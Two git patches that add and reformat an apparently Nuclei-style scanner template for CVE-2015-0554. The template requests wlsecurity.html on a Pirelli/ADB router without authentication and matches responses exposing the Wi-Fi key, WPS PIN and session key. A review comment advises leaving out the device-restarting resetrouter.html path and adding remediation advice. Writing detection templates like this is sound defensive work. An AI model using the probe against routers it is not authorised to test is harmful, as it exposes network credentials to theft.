From e3c053917477dc3577346df01036446d326e1fd3 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sun, 19 Dec 2021 20:23:13 +0700
Subject: [PATCH 1/2] Create CVE-2015-0554.yaml
---
 cves/2015/CVE-2015-0554.yaml | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 cves/2015/CVE-2015-0554.yaml
diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml
new file mode 100644
index 0000000000..a243aafda8
--- /dev/null
+++ b/cves/2015/CVE-2015-0554.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-0554
+
+info:
+ name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
+ author: daffainfo
+ severity: high
+ description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
+ - https://www.exploit-db.com/exploits/35721
+ tags: cve,cve2015,pirelli
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wlsecurity.html"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "var wpapskkey"
+ - "var WscDevPin"
+ - "var sessionkey"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 9461383161e6ce990818f22fdfa80b9178c8245e Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Mon, 20 Dec 2021 13:01:11 +0530
Subject: [PATCH 2/2] Update CVE-2015-0554.yaml
---
 cves/2015/CVE-2015-0554.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml
index a243aafda8..a879737372 100644
--- a/cves/2015/CVE-2015-0554.yaml
+++ b/cves/2015/CVE-2015-0554.yaml
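Review bot: Nothing in the template added by the first patch records that `resetrouter.html`, the second path named in `description`, is left out on purpose; per that description a direct request to it restarts the device, so the single `wlsecurity.html` GET under `requests` should stay the only probe. A comment above `path:` such as `# resetrouter.html is deliberately not requested: the advisory says it restarts the router` would stop a later edit from adding it. A match also presumably means the response body holds the Wi-Fi pre-shared key and WPS PIN (the matched `var wpapskkey` and `var WscDevPin` lines), so saved scan responses deserve the same handling as credentials. An `info` field `remediation:` telling operators to restrict access to the web interface and rotate the wireless key after a hit would help whoever triages the finding.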
@@ -6,9 +6,9 @@ info:
 severity: high
 description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
 reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
 - https://www.exploit-db.com/exploits/35721
- tags: cve,cve2015,pirelli
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-0554
+ tags: cve,cve2015,pirelli,router,disclosure

 requests:
 - method: GET
@@ -18,11 +18,11 @@ requests:
 matchers-condition: and
 matchers:
 - type: word
+ part: body
 words:
 - "var wpapskkey"
 - "var WscDevPin"
 - "var sessionkey"
- part: body
 condition: and

 - type: status